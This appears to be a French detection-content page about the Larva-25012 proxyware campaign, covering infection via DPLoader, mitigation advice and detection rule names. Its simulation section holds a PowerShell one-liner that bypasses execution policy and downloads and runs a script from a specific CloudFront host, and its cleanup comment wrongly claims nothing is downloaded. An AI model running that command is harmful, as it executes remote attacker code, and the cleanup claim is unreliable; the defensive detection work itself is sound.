Larva-25012 : Une campagne de distribution de proxyware en 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
L’attaquant Larva-25012 distribue activement des Proxywares pour monétiser les systèmes compromis en détournant la bande passante Internet des utilisateurs. La campagne s’appuie sur des infections DPLoader existantes et utilise plusieurs canaux de distribution, y compris des sites de téléchargement YouTube et GitHub. Le malware déploie plusieurs familles de Proxyware, notamment DigitalPulse, SOAX, Appsalt et IPRoyal.
Enquête
Le Centre d’Intelligence de Sécurité d’AhnLab (ASEC) a suivi l’activité continue de proxyjacking et a identifié les opérations renouvelées de Larva-25012 au cours du second semestre de 2026. L’enquête a révélé que les attaquants utilisent des variantes JavaScript et Python de DPLoader pour maintenir la persistance et exécuter des commandes PowerShell. Des tâches planifiées sont également créées pour garantir que les scripts malveillants continuent de s’exécuter sur les systèmes compromis.
Atténuation
Les utilisateurs doivent éviter de télécharger des fichiers exécutables à partir de sites Web suspects, de publicités pop-up ou de plateformes de partage de fichiers non officielles. Le logiciel doit être obtenu uniquement auprès de sources fiables et légitimes, tandis que les applications crackées et les sites de téléchargement illégaux doivent être évités. Les organisations doivent également veiller à ce que les solutions de protection des points d’extrémité, y compris V3, soient entièrement mises à jour.
Réponse
Lorsqu’une activité suspecte est détectée, les administrateurs doivent identifier et terminer les processus PowerShell malveillants et les tâches planifiées associées aux familles de Proxyware affectées. Les systèmes doivent également être vérifiés pour DPLoader, qui sert de composant clé d’infection et de persistance. Examinez le trafic réseau sortant pour des connexions non autorisées vers l’infrastructure C2 connue ou suspecte.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détection
Téléchargement ou téléchargement via Powershell (via cmdline)
Processus enfants NodeJS suspects [Windows] (via cmdline)
Désactiver la surveillance en temps réel de Windows Defender et autres changements de préférences (via cmdline)
Appel de méthodes .NET suspectes depuis Powershell (via powershell)
Abus possible de domaine de développement Cloudflare (via dns)
IOCs (HashMd5) pour détecter : Larva-25012 : Une campagne de distribution de Proxyware 2026
Détection de scripts d’installation de Proxyware PowerShell [Windows Powershell]
Exécution de simulation
-
Narration d’attaque & Commandes : Un adversaire, tentant d’installer proxyware pour un usage non autorisé de la bande passante (Larva-25012), exécute une commande en une ligne PowerShell. L’objectif est de contourner la vérification des fichiers locaux en téléchargeant directement la charge utile en mémoire. Ils utilisent le
-ExecutionPolicy Bypassdrapeau pour s’assurer que le script s’exécute etiwrpour récupérer le fichier depuis une distribution Cloudfront, en le transmettant àiexpour une exécution immédiate. Cette ligne de commande spécifique est l’une des signatures ciblées dans la règle de détection. -
Script de test de régression :
# Simulation de l'installation de Proxyware Larva-25012 # Cette commande est spécifiquement conçue pour correspondre à la sélection2 dans la règle de détection. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # Nous utilisons Start-Process pour nous assurer que la ligne de commande est capturée comme un nouvel événement de processus Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
Commandes de nettoyage :
# Aucun fichier n'est réellement téléchargé en raison de la nature du pipe 'iex' en simulation, # mais si des artefacts ont été créés, ils seraient supprimés ici. Write-Host "Nettoyage de simulation terminé. Aucun artefact persistant créé."